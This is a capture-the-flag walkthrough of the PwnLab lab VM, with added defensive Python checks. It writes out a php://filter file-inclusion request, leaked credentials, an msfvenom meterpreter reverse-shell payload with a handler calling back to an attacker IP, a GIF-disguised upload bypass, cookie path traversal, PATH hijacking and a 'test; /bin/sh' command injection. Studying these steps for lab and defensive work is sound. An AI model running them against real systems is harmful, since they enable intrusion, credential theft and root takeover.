Penetration Testing in PwnLab (CTF Challenge)

In this article we will walk through a boot2root penetration testing challenge, i.e. PwnLab. PwnLab is a vulnerable framework, based on the concept of CTF (capture the flag), with a bit of security which is a little complicated to bypass. But it's not impossible. So, let us learn how we can get access to it.


To start, let us assume that we do not know the IP of PwnLab, so we search for the IP address beforehand. There is a command that shows us all the IPs present in our network, so go to the terminal of your Kali and type:

netdiscover

Target IP = 192.168.0.105

Now that we know the target, we start our penetration testing. First, we will scan with nmap; we will apply an aggressive scan as it gives detailed information and is fast. The command is:

nmap -A 192.168.0.105

We have the result of scanning and as you can see there are only three ports open and they are: 80, 111, 3306.

Our target IP is 192.168.0.105, as its MAC vendor is VMware. It is our best shot, but to be sure let us check this IP in our browser. We can cross-check it there because port 80 is open, i.e. it can be opened in a browser. In the browser we can see that PwnLab has three pages: home, login and upload. To enter the server we have to upload our code to it, and for that we must know a username and password.

As we need to know the username and password, we will use the nikto command to find out which file is storing them. Nikto helps us to learn the file names and the data they contain. The command for this is:

nikto -h 192.168.0.105

As you can see from the line "/config.php: PHP Config file may contain database IDs and passwords", config.php is the file that has the username and passwords. Now that we know the file name, we can use the curl command to find out the data of the file.

Curl is a computer software project providing a library and command-line tool for transferring data using various protocols. The cURL project produces two products, libcurl and cURL. It was first released in 1997. The name originally stood for “see URL”.

And the curl command is:

curl "http://192.168.0.105/index.php?page=php://filter/convert.base64-encode/resource=config"

The highlighted part in the above image is our result and has the information about the username and passwords. But note that the information is base64 encoded, so we will have to decode it in order to read it.

To decode it we will use HackBar. HackBar is a Mozilla add-on that contains various functions, but the most important one is that it helps us to encode and decode base64 strings.

To decode, copy the string, go to HackBar and click on the encoding option. A drop-down menu will appear; now select the decode option.

A dialog box will open, paste the copied string on the text box and click on OK.

The decoded result will appear in your HackBar in a readable form. This way you will have your username and password.

So, the username is root and password is H4u%QJ_H99.

Now we use the mysql command to see the usernames and passwords. The command is:

mysql -h 192.168.0.105 -u root -p Users

After typing the command it asks for the password, so enter the decoded password here and press Enter.

You will now have the usernames and passwords; in this case the usernames are kent, mike and kane, with their passwords. These passwords are base64 encoded, and to decode them use HackBar as we did earlier. Also shown below:

And like this we will have our password.

Now that we have our username and password, we need to create a PHP file that we will upload. We will make this raw file through msfvenom. The command is:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

Once the file is generated, copy the code from <?php to die(); and paste it in a text file, and after that change its extension to .php

Now if you try to upload this file you will get an error saying that the extension is not allowed, please upload images only. Therefore, you will need to change the extension of your .php file.

Before changing the extension you need to add GIF98 at the top of the code as shown below, and then change the extension to .gif

After changing the extension, when you try to upload the file you will succeed.
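A stricter server-side check for the upload step above, as an added example that is not PwnLab's own code: it requires a full GIF87a/GIF89a signature, non-zero dimensions and a trailer byte, and rejects embedded PHP open tags. The function name and the sample bytes are constructed for illustration.

```python
import re
import struct

GIF_SIGNATURES = (b"GIF87a", b"GIF89a")          # the only valid 6-byte GIF headers
PHP_TAG = re.compile(rb"<\?(php|=)", re.I)       # PHP open tags inside the upload

def check_gif_upload(filename, data):
    """Return (accepted, reason) for an upload that claims to be a GIF."""
    if not filename.lower().endswith(".gif"):
        return False, "extension is not .gif"
    if data[:6] not in GIF_SIGNATURES:
        return False, "missing GIF87a/GIF89a signature"
    if len(data) < 13:
        return False, "truncated logical screen descriptor"
    width, height = struct.unpack("<HH", data[6:10])
    if width == 0 or height == 0:
        return False, "zero image dimensions"
    if not data.rstrip(b"\x00").endswith(b"\x3b"):
        return False, "missing GIF trailer byte"
    # 0x3b is also ';', so PHP text can pass the trailer test; scan the content too.
    if PHP_TAG.search(data):
        return False, "embedded PHP open tag"
    return True, "ok"

# Constructed 1x1 GIF: header, screen descriptor, one image block, trailer.
SAMPLE_GIF = (b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0, 0, 0) + b"\x2c"
              + struct.pack("<HHHHB", 0, 0, 1, 1, 0) + b"\x02\x02\x4c\x01\x00\x3b")

# Constructed stand-in for the renamed file from the walkthrough (harmless body).
SAMPLE_RENAMED = b"GIF98\n<?php /* constructed placeholder */ die();"

if __name__ == "__main__":
    print(check_gif_upload("logo.gif", SAMPLE_GIF))
    print(check_gif_upload("sample.gif", SAMPLE_RENAMED))
    print(check_gif_upload("sample.gif", b"GIF89a<?php die();"))
```

The content scan is a second layer only: a pattern such as <?= can occur by chance in large binary images, so re-encoding accepted images server-side is the more robust choice.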

Once the file is uploaded, we still need a way to execute it. For that, right-click on the file and click on the copy image location option.

Now that you have copied the image location, you need to install Tamper Data. Tamper Data is a Firefox extension which gives you the power to view, record and even modify outgoing HTTP requests. It helps you to capture cookies and HTTP requests.

Open Tamper Data and click on Start Tamper.

A dialog box will appear. In it, click on the Tamper button in the right corner.

By doing so another dialog box will appear. Keep this dialog box open in the background and open Metasploit meanwhile.

After opening metasploit type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Running the above commands will help you gain a meterpreter session on the lab.

Now go to the Tamper Data dialog box which was open in the background. In the dialog box you can see there is a cookie option. In the text box adjacent to the cookie option, delete whatever was written and type:

lang=../*Image location path*

Here,

*image location path* is the path of the file that you uploaded and then copied.

By doing so you are using Tamper Data, which normally helps us to capture cookies, to have your own malicious file executed. After giving the path, the second you click on OK you will have your meterpreter session.

But this is not enough, as we still need to bypass admin. If you go to the shell of the lab and try to switch user, you will note that the command shows an error. To gain full access to PwnLab you will still need to run some commands. So, type:
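Both web steps in this walkthrough pass a file path through request data: the page parameter carrying a php:// wrapper and the lang cookie carrying a ../ path. The following added example (not part of the original article or of PwnLab) screens requests for exactly those two patterns; the function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

WRAPPER = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)    # php://, data://, ...
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")        # a ".." path segment

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding before any pattern is applied."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def parse_cookies(header):
    pairs = (item.split("=", 1) for item in header.split(";") if "=" in item)
    return {name.strip(): value.strip() for name, value in pairs}

def screen_request(url, cookie_header=""):
    """Return findings for the page parameter and the lang cookie of one request."""
    findings = []
    for value in parse_qs(urlsplit(url).query).get("page", []):
        value = fully_decode(value)
        if WRAPPER.match(value):
            findings.append(("page", "stream wrapper", value))
        elif TRAVERSAL.search(value):
            findings.append(("page", "path traversal", value))
    lang = parse_cookies(cookie_header).get("lang")
    if lang is not None:
        lang = fully_decode(lang)
        if WRAPPER.match(lang) or TRAVERSAL.search(lang) or lang.startswith("/"):
            findings.append(("lang", "path in cookie", lang))
    return findings

# Constructed sample requests (URL, Cookie header); not captured traffic.
SAMPLES = [
    ("/index.php?page=login", "lang=en"),
    ("/index.php?page=php://filter/convert.base64-encode/resource=config", ""),
    ("/index.php", "lang=../upload/sample.gif"),
]

if __name__ == "__main__":
    for url, cookie in SAMPLES:
        print(url, cookie or "-", screen_request(url, cookie))
```

Screening like this supports detection; the fix on the application side is to map the page and lang values to a fixed list of known files rather than using them as paths.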

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

The execution of the command will take you inside PwnLab, and if you try to switch the user now, you will succeed. The command to switch the user is:

su kane

iSv5Ym2GRo

Here,

su –> denotes the switch user

kane –> the user you want to switch to

iSv5Ym2GRo –> is the password

After executing it, you will enter the user kane.

Next, if you type the ls command you will see that there is a folder named home in the user that we just entered. We will go into that folder, and to do so, type:

cd home

As you have entered the home folder, type:

ls -lsa

This command will show you all the users in home with all the details. So, now that you know how many users there are and what their usernames are, go back to the kane user, and for that type:

cd kane (this command will bring you back to the kane user)

ls -lsa (this command will list all the folders present in the kane)

As you can see in the image below, there is a file in the kane user called msgmike. Let us try to open it; therefore, type:

./msgmike

If you try to open it, it will give you an error saying no such file exists. So, now let us change user and see if we can open this file from another user. Type:

cd ..

cd kent

cd mike

You can see that permission to every other user is denied. So now, type:

echo "/bin/bash" > cat

chmod 777 cat

The cat command normally allows us to create single or multiple files, view the contents of a file, concatenate files and redirect output to the terminal or to files. With the above commands we create our own file named cat containing /bin/bash, and after creating the file we give it access permissions through the chmod command.

Then further type:

export PATH=.:$PATH

./msgmike

Once the above command is executed, we will have access to the msgmike file as we desired and will have entered the other user named mike. Now if you type:

id

You will see that the above command shows you the users and also informs you which user is the administrator.

Now that you are in the user mike, open the home folder and then go to the mike folder. And then type:

./msg2root

test; /bin/sh

id (this command will show you the users)

whoami (this command will tell you that you are the administrator)

ls (it will show the list of files in the root)

cat flag.txt (this command will display flag.txt, which was our main motive)
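The two privilege steps above work because msgmike resolves cat through the caller's PATH and msg2root lets typed input reach a shell. The added example below (not the binaries' own code, whose source is not shown on this page; the pattern and function names are assumptions, written in Python for brevity) contrasts that pattern with a hardened invocation and audits a PATH value.

```python
import os
import stat
import subprocess

SAFE_ENV = {"PATH": "/usr/bin:/bin"}   # fixed search path chosen by the helper

def risky_path_entries(path):
    """Return PATH entries that let the current or a world-writable directory win."""
    risky = []
    for entry in path.split(":"):
        if entry in ("", ".") or not os.path.isabs(entry):
            risky.append(entry or "<empty>")     # an empty entry means the current directory
        elif os.path.isdir(entry) and os.stat(entry).st_mode & stat.S_IWOTH:
            risky.append(entry)
    return risky

def send_unsafe(message):
    # Assumed pattern: user input pasted into a shell command line, command found via PATH.
    done = subprocess.run("echo " + message, shell=True, capture_output=True, text=True)
    return done.stdout

def send_safe(message):
    # Absolute binary, argv list (no shell parsing), environment the caller cannot set.
    done = subprocess.run(["/bin/echo", message], env=SAFE_ENV,
                          capture_output=True, text=True)
    return done.stdout

if __name__ == "__main__":
    constructed = "test; echo INJECTED"            # constructed, harmless input
    print(repr(send_unsafe(constructed)))          # the shell ran two commands
    print(repr(send_safe(constructed)))            # one literal message
    print(risky_path_entries(".:/usr/bin:/bin"))   # PATH as set in the walkthrough
```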

This was an excellent challenge. It requires us to think outside of the box, correlate findings, and manually validate vulnerabilities. This was a good example of the importance of manual methods, as no automated vulnerability scanner would have disclosed the flaws found during this engagement. This challenge also demonstrates the importance of validating user input. 

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.
